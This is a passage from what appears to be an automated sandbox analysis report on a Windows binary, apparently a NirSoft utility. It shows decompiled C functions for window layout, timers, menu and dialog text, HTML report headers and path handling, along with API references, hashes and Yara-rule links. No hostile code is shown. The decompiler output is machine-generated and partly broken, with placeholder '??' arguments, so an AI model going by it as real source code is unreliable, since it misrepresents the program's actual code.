					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
					asm("sbb eax, eax");
					 *0x412ecc =  ~(_t6 - 1) + 1;
					E00406D4D(0x412ed0, L"charset", 0x3f);
					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                                                      0x004071d5
                                                                                                                                                      0x004071dd
                                                                                                                                                      0x004071eb
                                                                                                                                                      0x004071fb
                                                                                                                                                      0x0040720c
                                                                                                                                                      0x00407215
                                                                                                                                                      0x00407224
                                                                                                                                                      0x00407229
                                                                                                                                                      0x0040723a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00407257
                                                                                                                                                      0x00407258

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5
                                                                                                                                                      • wcscpy.MSVCRT ref: 004071EB
                                                                                                                                                      • wcscpy.MSVCRT ref: 004071FB
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32 ref: 0040720C
                                                                                                                                                        • Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                      • String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                      • API String ID: 3176057301-819253090
                                                                                                                                                      • Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
                                                                                                                                                      • Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
                                                                                                                                                      • Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
                                                                                                                                                      • Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040A5AB, Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040A5AB(void* __esi) {
				struct HDWP__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				intOrPtr _v44;
				struct tagPOINT _v56;
				void* _t53;
				int _t99;
				void* _t101;

				_t101 = __esi;
				if( *((intOrPtr*)(__esi + 0x244)) != 0) {
					GetClientRect( *(__esi + 0x208),  &_v40);
					GetWindowRect( *(__esi + 0x214),  &_v56);
					_v20 = _v44 - _v56.y + 1;
					GetWindowRect( *(__esi + 0x218),  &_v56);
					_v16 = _v40.right - _v40.left;
					_t99 = _v44 - _v56.y + 1;
					_v24 = _v40.bottom - _v40.top;
					_v12 = 0xdc;
					if( *(__esi + 0x6d4) != 0) {
						GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
						MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
						_v12 = _v44 + 6;
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
						_v12 = _v12 & 0x00000000;
					}
					_v8 = BeginDeferWindowPos(4);
					DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t53;
			}














                                                                                                                                                      0x0040a5ab
                                                                                                                                                      0x0040a5b8
                                                                                                                                                      0x0040a5ca
                                                                                                                                                      0x0040a5e0
                                                                                                                                                      0x0040a5e9
                                                                                                                                                      0x0040a5f6
                                                                                                                                                      0x0040a604
                                                                                                                                                      0x0040a60d
                                                                                                                                                      0x0040a615
                                                                                                                                                      0x0040a618
                                                                                                                                                      0x0040a61f
                                                                                                                                                      0x0040a637
                                                                                                                                                      0x0040a647
                                                                                                                                                      0x0040a653
                                                                                                                                                      0x0040a653
                                                                                                                                                      0x0040a663
                                                                                                                                                      0x0040a665
                                                                                                                                                      0x0040a665
                                                                                                                                                      0x0040a67d
                                                                                                                                                      0x0040a68e
                                                                                                                                                      0x0040a6ad
                                                                                                                                                      0x0040a6d8
                                                                                                                                                      0x0040a6f0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040a6fc
                                                                                                                                                      0x0040a6fe

                                                                                                                                                      APIs
                                                                                                                                                      • GetClientRect.USER32 ref: 0040A5CA
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040A5E0
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040A5F6
                                                                                                                                                      • GetDlgItem.USER32 ref: 0040A630
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040A637
                                                                                                                                                      • MapWindowPoints.USER32 ref: 0040A647
                                                                                                                                                      • BeginDeferWindowPos.USER32 ref: 0040A66B
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040A6F5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                      • Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                      • Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
                                                                                                                                                      • Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
                                                                                                                                                      • Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403899, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101timewindowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                      			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				void* __esi;
				struct HDWP__* _t27;
				intOrPtr* _t51;
				RECT* _t56;

				_push(__ecx);
				_t51 = __ecx;
				if(_a4 != 0x18) {
					L4:
					if(_a4 == 2) {
						KillTimer( *(_t51 + 0x10), 0x41);
					}
					if(_a4 != 0x113) {
						L11:
						if(_a4 == 5) {
							_t27 = BeginDeferWindowPos(5);
							_t56 = _t51 + 0x40;
							_v8 = _t27;
							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
							EndDeferWindowPos(_v8);
							InvalidateRect( *(_t56 + 0x10), _t56, 1);
						}
						goto L13;
					} else {
						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
							L13:
							return E004015CE(_t51, _a4, _a8, _a12);
						} else {
							 *((intOrPtr*)(_t51 + 0x78)) = 0;
							 *((intOrPtr*)( *_t51 + 4))(0);
							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
							goto L11;
						}
					}
				}
				if(_a8 == 0) {
					KillTimer( *(__ecx + 0x10), 0x41);
					goto L4;
				}
				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
				goto L13;
			}








                                                                                                                                                      0x0040389c
                                                                                                                                                      0x004038ac
                                                                                                                                                      0x004038ae
                                                                                                                                                      0x004038cf
                                                                                                                                                      0x004038d3
                                                                                                                                                      0x004038da
                                                                                                                                                      0x004038da
                                                                                                                                                      0x004038e3
                                                                                                                                                      0x0040392e
                                                                                                                                                      0x00403932
                                                                                                                                                      0x00403936
                                                                                                                                                      0x00403945
                                                                                                                                                      0x00403949
                                                                                                                                                      0x0040394c
                                                                                                                                                      0x0040395d
                                                                                                                                                      0x0040396e
                                                                                                                                                      0x0040397f
                                                                                                                                                      0x00403990
                                                                                                                                                      0x00403998
                                                                                                                                                      0x004039a4
                                                                                                                                                      0x004039a4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004038e5
                                                                                                                                                      0x004038e9
                                                                                                                                                      0x004039aa
                                                                                                                                                      0x004039be
                                                                                                                                                      0x0040390c
                                                                                                                                                      0x00403911
                                                                                                                                                      0x00403914
                                                                                                                                                      0x00403928
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403928
                                                                                                                                                      0x004038e9
                                                                                                                                                      0x004038e3
                                                                                                                                                      0x004038b3
                                                                                                                                                      0x004038cd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004038cd
                                                                                                                                                      0x004038bd
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004038CD
                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004038DA
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004038F8
                                                                                                                                                      • GetParent.USER32(?), ref: 00403921
                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00403928
                                                                                                                                                      • BeginDeferWindowPos.USER32 ref: 00403936
                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 00403998
                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004039A4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                      • String ID: A
                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                      • Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                      • Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
                                                                                                                                                      • Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
                                                                                                                                                      • Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040D7CE, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 56%
                                                                                                                                                      			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040DFD6();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040DFD6();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040DFD6();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040DFD6();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40f454, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}












                                                                                                                                                      0x0040d7e1
                                                                                                                                                      0x0040d7e6
                                                                                                                                                      0x0040d7e7
                                                                                                                                                      0x0040d7e8
                                                                                                                                                      0x0040d875
                                                                                                                                                      0x0040d87c
                                                                                                                                                      0x0040d88a
                                                                                                                                                      0x0040d891
                                                                                                                                                      0x0040d89f
                                                                                                                                                      0x0040d8a6
                                                                                                                                                      0x0040d8c0
                                                                                                                                                      0x0040d8cb
                                                                                                                                                      0x0040d8dd
                                                                                                                                                      0x0040d8fb
                                                                                                                                                      0x0040d900
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040d900
                                                                                                                                                      0x0040d7f5
                                                                                                                                                      0x0040d7fc
                                                                                                                                                      0x0040d80a
                                                                                                                                                      0x0040d811
                                                                                                                                                      0x0040d82b
                                                                                                                                                      0x0040d838
                                                                                                                                                      0x0040d84a
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                      • Opcode ID: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                      • Instruction ID: bd80c20c5eef5304b465cefa7c525b6dc43605deb3d47911a7a30c53393811c5
                                                                                                                                                      • Opcode Fuzzy Hash: 860c56ee3740ab7c76ae19f9702a4c2ad5aeadb2154bffe7709fa0f8ec1fc05c
                                                                                                                                                      • Instruction Fuzzy Hash: 9F315E71900129AADB20DF95CC85FEB777CFF48304F0044FAB50AB6152E7749A588B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00407047, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                      			E00407047(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040E340(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x4131d0; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00406CC6(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00407042, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00407042, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00406DE5(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E00406F88, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00406CC6(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x412c34 =  *0x412c34 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E00406E97(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}













                                                                                                                                                      0x0040704f
                                                                                                                                                      0x00407054
                                                                                                                                                      0x0040705b
                                                                                                                                                      0x00407098
                                                                                                                                                      0x0040709c
                                                                                                                                                      0x004070a2
                                                                                                                                                      0x004070aa
                                                                                                                                                      0x004070ac
                                                                                                                                                      0x004070c2
                                                                                                                                                      0x004070c2
                                                                                                                                                      0x004070c7
                                                                                                                                                      0x004070c8
                                                                                                                                                      0x004070e2
                                                                                                                                                      0x004070e4
                                                                                                                                                      0x004070e6
                                                                                                                                                      0x004070e9
                                                                                                                                                      0x004070fc
                                                                                                                                                      0x004070fc
                                                                                                                                                      0x0040710c
                                                                                                                                                      0x00407113
                                                                                                                                                      0x0040712a
                                                                                                                                                      0x00407130
                                                                                                                                                      0x00407137
                                                                                                                                                      0x00407146
                                                                                                                                                      0x0040714b
                                                                                                                                                      0x00407157
                                                                                                                                                      0x00407160
                                                                                                                                                      0x004070ae
                                                                                                                                                      0x004070bc
                                                                                                                                                      0x004070bc
                                                                                                                                                      0x004070be
                                                                                                                                                      0x004070c0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004070b0
                                                                                                                                                      0x004070b3
                                                                                                                                                      0x004070b9
                                                                                                                                                      0x004070b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004070b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004070b3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004070bc
                                                                                                                                                      0x004070ac
                                                                                                                                                      0x0040705d
                                                                                                                                                      0x0040705d
                                                                                                                                                      0x00407062
                                                                                                                                                      0x00407063
                                                                                                                                                      0x00407068
                                                                                                                                                      0x0040706f
                                                                                                                                                      0x00407075
                                                                                                                                                      0x0040707c
                                                                                                                                                      0x0040707e
                                                                                                                                                      0x00407080
                                                                                                                                                      0x00407081
                                                                                                                                                      0x00407084
                                                                                                                                                      0x0040708d
                                                                                                                                                      0x0040708d
                                                                                                                                                      0x00407166
                                                                                                                                                      0x0040716d

                                                                                                                                                      APIs
                                                                                                                                                      • LoadMenuW.USER32 ref: 0040706F
                                                                                                                                                        • Part of subcall function 00406E97: GetMenuItemCount.USER32 ref: 00406EAD
                                                                                                                                                        • Part of subcall function 00406E97: memset.MSVCRT ref: 00406ECC
                                                                                                                                                        • Part of subcall function 00406E97: GetMenuItemInfoW.USER32 ref: 00406F08
                                                                                                                                                        • Part of subcall function 00406E97: wcschr.MSVCRT ref: 00406F20
                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040708D
                                                                                                                                                      • CreateDialogParamW.USER32 ref: 004070E2
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 004070ED
                                                                                                                                                      • CreateDialogParamW.USER32 ref: 004070FA
                                                                                                                                                      • memset.MSVCRT ref: 00407113
                                                                                                                                                      • GetWindowTextW.USER32 ref: 0040712A
                                                                                                                                                      • EnumChildWindows.USER32 ref: 00407157
                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 00407160
                                                                                                                                                        • Part of subcall function 00406CC6: _snwprintf.MSVCRT ref: 00406CEB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                      • String ID: caption
                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                      • Opcode ID: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                      • Instruction ID: 143ff9b161303c46051d95ab40737f9cae21d75e3476d01ba51655d965e5fbc2
                                                                                                                                                      • Opcode Fuzzy Hash: cadb9d31fe5310bdce87adbc6d0a26ae13e87b491cdbe26e05780d9e60c23650
                                                                                                                                                      • Instruction Fuzzy Hash: 1131B472504208BFEF219F60DC85EAB3B69FB00314F10847AF909A6191D7759D64CB56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00409D04, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                      			E00409D04(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040E340(0x1800, __ecx);
				_t57 = _t49;
				E00408857(_t57, _t49, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x412ed0; // 0x0
				if(_t62 != 0) {
					_push(0x412ed0);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040DFD6();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x412ecc; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00409130(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x94))( *((intOrPtr*)( *_t57 + 0x90))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040DFD6();
				_t43 = E00408857(_t57, _t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00409336(_t57, _t64, _a4);
				}
				return _t43;
			}

















                                                                                                                                                      0x00409d04
                                                                                                                                                      0x00409d0c
                                                                                                                                                      0x00409d1c
                                                                                                                                                      0x00409d20
                                                                                                                                                      0x00409d35
                                                                                                                                                      0x00409d3c
                                                                                                                                                      0x00409d4a
                                                                                                                                                      0x00409d51
                                                                                                                                                      0x00409d5f
                                                                                                                                                      0x00409d66
                                                                                                                                                      0x00409d6b
                                                                                                                                                      0x00409d6e
                                                                                                                                                      0x00409d7a
                                                                                                                                                      0x00409d7c
                                                                                                                                                      0x00409d81
                                                                                                                                                      0x00409d8c
                                                                                                                                                      0x00409d8d
                                                                                                                                                      0x00409d8e
                                                                                                                                                      0x00409d93
                                                                                                                                                      0x00409d93
                                                                                                                                                      0x00409d96
                                                                                                                                                      0x00409d9c
                                                                                                                                                      0x00409daa
                                                                                                                                                      0x00409db0
                                                                                                                                                      0x00409dcb
                                                                                                                                                      0x00409de5
                                                                                                                                                      0x00409de6
                                                                                                                                                      0x00409df1
                                                                                                                                                      0x00409df2
                                                                                                                                                      0x00409df3
                                                                                                                                                      0x00409e07
                                                                                                                                                      0x00409e0c
                                                                                                                                                      0x00409e10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409e15
                                                                                                                                                      0x00409e1e

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00409D81
                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00409DA4
                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00409DE6
                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00409D14
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                      • Opcode ID: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                      • Instruction ID: a7c5b093c416f5d9ad8a61283befa58304fd8337d6ea87f6454d28f796e895fe
                                                                                                                                                      • Opcode Fuzzy Hash: d8f9f2fa32ef8c2b6d7c2e6d24b479b72ee30a36092e5f9a2670ad64564f4937
                                                                                                                                                      • Instruction Fuzzy Hash: 37219172A001186ACB21AB95CC41FEA37BCFF4C345F0440BEF549E3181DB789E948B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040CAF2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E0040CAF2(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040546C(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E004059AA( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
